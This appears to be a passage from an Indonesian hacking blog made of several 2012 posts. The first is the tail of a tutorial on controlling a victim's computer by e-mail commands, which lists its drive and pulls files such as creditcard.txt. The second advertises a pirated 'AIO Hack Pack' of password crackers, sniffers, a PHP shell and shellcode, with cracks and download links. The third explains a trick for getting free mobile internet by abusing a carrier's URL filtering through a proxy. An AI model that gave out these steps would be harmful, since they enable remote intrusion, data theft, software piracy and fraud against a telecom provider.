Lalu setelah selesai klik lagi Tools dan pilih Options dan kita tentukan tiap berapa menit software ini mengecek e-mail di inbox yang sudah di setting tadi

Kalau udah kita klik start dan komputer yang terinstall sudah siap dikendalikan dengan e-mail.Sekarang kita buka e-mail lalu kirimkan perintah ke e-mail yang sudah kita set tadi di softwarenya.Tadi saya menggunakan email dari drivehq yaitu j0ck3rmaniax@drivehq.com sedangkan e-mail untuk memberi perintah adalah jockermaniax@gmail.com,jadi saya buka gmail dan mulai menjalankan perintah darisana.Untuk mode penulisan perintahanya sebagai berikut:
Dibagian penerima pesan saya masukkan email dari drivehq tadi,lalu dibagian subject saya isi passsword yang sudah saya tentukan,misal kita mengisi kolom password tadi dengan123456 maka di bagian subject di isi 123456,dan dibagian Body/Isi surat kita masukkan perintah yang kita kehendaki.Misal saya ingin liat isi drive C: korban,maka dibagian Body saya tulis DIR C: lalu kita kirim

Remote By Mail akan mengecek inbox di e-mail j0ck3rmaniax@drivehq.com,bila ada perintah baru dia akan segera merespon dan membalas perintah tersebut ke e-mail saya tadi yaitu jockermaniax@gmail.com


Thuu..keliatan isi Drive C: nya.Bila kita ingin mengambil file yang ada di komputer korban,maka kita ketikkan perintah SEND ( drive\directory\namafile),misal saya akan mengambil file yang bernama creditcard.txt yang terletak di drive C:\data\ maka saya ketikkan SEND C:\data\creditcard.txt di bagian body e-mail.
Sekian tulisan dari saya,bila ada salah kata mohon maaf sebesar besarnya yaaa… :D

courtesy.xcode
selengkapnya->

Rabu, 28 Maret 2012

AIO Hack Pack 2012 v3.2.135.68 | 1.4 Gb

. Rabu, 28 Maret 2012
0 komentar


Books:
Google Hacking
SolarWinds Engineer Toolset Administrator Guide
SQL Injection. Breaking ASP + MSSQL
Administration and Security Linux
Addresses on the Internet
Linux security
Hacking Software
Types of Hackers
Virtual Wifi in Windows 7
BIOS beep codes
Information Security
Local Area Networks
Organizing Wireless Networks
Tricks Hack
Guide to Hackers
Network Administration
List of ports and Description
Technique Hack - Sockets, Exploits, Shell-code
Technique of Network Attacks
Information Security Technology

Others
Default Password List
Diction
Peek Drivers
trackers_list

Recovery Tools
Advanced Archive Password Recovery Professional v4.53
Advanced EFS Data Recovery v4.0
Advanced IM Password Pecovery v4.10.297
Advanced Office Password Recovery Pro v5.04.547
Advanced PDF Password Recovery v5.04
Elcomsoft Distributed Password Recovery v2.90.215
Elcomsoft System Recovery Pro v3.0.466
Elcomsoft Wireless Security Auditor v4.0.211
Internet Password Breaker v2.0.306
Lightning Hash Cracker v0.60
Password Recovery Bundle 2011 v1.80
Password Recovery Kit Enterprise v9.7.1572
Proactive Password Auditor v2.01
Proactive System Password Recovery v6.3.1.786
RAR Password Recovery v1.53
RAR Password Unlocker v3.3
Registry Tracer v2.11
ZIP Password Recovery v4.0

X-Tools
! NEW Ace Password Sniffer v1.4
Aircrack-NG v1.1
AirPcap v4.1.1
! NEW Angry IP Scanner v3.0
ApacheConf Lite v7.1
! NEW Brutus AET2
CommView for WiFi v5.6.553
CommView for WiFi v6.0.585 VoIP
CommView v6.1.636
Dependency Walker v2.2
Dialupass v3.16
! NEW Engage Packet Builder v2.1.0
ExploitMyUnion v2.1
! NEW Hidden Administrator v4.1
Htpasswd Generator v4.1.1
LanTricks (9 tools)
! NEW MIPKO Employee Monitor v6.0.4.1014
OllyDbg v2.0
PasswordsPro v3.1.1.0
! NEW PHP Shell
Product Key Explorer v2.8.6.0
! NEW Proxy Finder Enterprise v2.5
! NEW Proxy Hunter v1.4
PuTTY v0.60
Resource Hacker v3.6
Resource Tuner
Safe3 SQL Injector v8.4
! NEW Shellcode
SMAC v2.7 Pro
SolarWinds Engineer Toolset v9.2
Sysinternals Suite
! NEW The Dude v3.6
TrueCrypt v7.1
! NEW VisualRoute 2010 Pro 14
w3af v1.0
! NEW WinGate v6.5.2.1217
WinHex v16.1 SR-6
WinSCP v4.3.5

Video
LiveCD powerful weapons pro
Microsoft Vision 2019
Arsenal of military Sysadmin
Cracking WPA
We reveal SSL
Hyperactive virtuality
Compact Windows
Mastered with WPA2

And More....


Treatment procedure:
Enter key / Replace files / patch

WARNING!
Some programs, keygens, patches, cracks are determined by antivirus programs as a potentially dangerous programs! If you are afraid - do not swing!

System requirements:
Windows XP
Windows Vista
Windows 7
WinRAR
Adobe Reader

No Password

Download Here

Via Upload :
  1. Part 1 - 250 Mb
  2. Part 2 - 250 Mb
  3. Part 3 - 250 Mb
  4. Part 4 - 250 Mb
  5. Part 5 - 250 Mb
  6. Part 6 - 185 Mb


Via Turbobit :

AIO Hack Pack 2012 v3.2.135.68 | 1.4 Gb

Via Extabit :

AIO Hack Pack 2012 v3.2.135.68 | 1.4 Gb

courtesy.alghifary
selengkapnya->

Selasa, 27 Maret 2012

Trik internet gratis pakai ispce (via smart)

. Selasa, 27 Maret 2012
0 komentar

Sebelumnya, tolong yah jika tidak berhasil jangan marah

Silahkan deh di baca cara-caranya :

Pertama pulsanya minimal jah takutnya teh gagal yah minimal Rp.1000, lalau  kita dial dulu modem brada dan sista pake kartu smart dan coba aja ke chrome atau  firefox, lalu ketikkan:
smartfren.com@url:google.com
dan coba liat halaman pencarian google kebuka... jd ada vuln disitu. yuk kita gabungin pake proxy.software yg akan kita butuhkan adalah ispce.


Cara Pemakaianya sbg :

1. Install program ispce td, trus buka, beri centang pada query mode, dan kita atur listen portx 127 biar gampang nantinya teh. klik OK.

2. Kalau Pulsanya teh habis kan hanya bisa martfren.com, smart-telecom.co.id, dan jump.smart-telecom.co.id, jadi masuklah pd Query URL Configuration, pilih front query, trus masukkan salah satu domain tsb pd font query + simbol "@".

3. Kita beralih pd proxy configuration, untukk proxy server silahkan deh cari sendiri hee,,, dgn catatan proxy dgn port 80 dan 3128 yg hanya bisa dgunakan disini, bis pihak smartfren mungkin hanya membuka kedua port tsb. untuk proxy cari di google sendiri yah ato ke hidemyass.com banyak kok.. cari yang fast proxy, biar cepet,, ^^*

4. Selanjutnya klik REFRESH 3x, lalu minimize, jangan di-exit!! Ok ~~ lalu klik next...
buka firefox. ke menu Options - Advanced - Network - Setting. Atur http proxy 127.0.0.1, dan gunakan listen portx yg tadi yaitu 127., berikan centang pd use this proxy.........
kemudian kosongkan pd No proxy for. 

5. Selesai Dech Moga Bermanfaat dan semoga beruntung. Amiin ~,~

Untuk Download Softwarenya silahkan di download ^^*

  1. Via Mediafire - 1 Mb
  2. Via Sharebeast - 1 Mb
  3. Via file4share - 1 Mb
selengkapnya->